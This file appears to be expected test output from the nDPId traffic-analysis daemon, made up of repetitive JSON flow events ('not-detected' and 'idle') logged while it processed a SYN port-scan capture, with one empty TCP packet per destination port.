+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060395,"flow_last_seen":1278275060395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
